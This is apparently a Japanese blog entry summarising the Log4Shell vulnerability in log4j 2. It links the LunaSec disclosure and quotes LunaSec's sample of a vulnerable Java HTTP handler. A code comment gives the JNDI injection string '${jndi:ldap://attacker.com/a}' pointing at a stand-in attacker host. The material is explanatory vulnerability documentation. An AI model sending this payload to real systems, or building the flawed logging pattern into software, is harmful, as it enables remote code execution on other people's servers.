【ブログ】
◆Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package (LunaSec, 2021/12/09)
https://www.lunasec.io/docs/blog/log4j-zero-day/
【関連まとめ記事】
◆Log4j (まとめ)
https://vul.hatenadiary.com/entry/Log4j
【Exploit Code】
import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.io.*; import java.sql.SQLException; import java.util.*; public class VulnerableLog4jExampleHandler implements HttpHandler { static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName()); /** * A simple HTTP endpoint that reads the request's User Agent and logs it back. * This is basically pseudo-code to explain the vulnerability, and not a full example. * @param he HTTP Request Object */ public void handle(HttpExchange he) throws IOException { String userAgent = he.getRequestHeader("user-agent"); // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header. // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a} log.info("Request User Agent:{}", userAgent); String response = "<h1>Hello There, " + userAgent + "!</h1>"; he.sendResponseHeaders(200, response.length()); OutputStream os = he.getResponseBody(); os.write(response.getBytes()); os.close(); } }
出典: https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code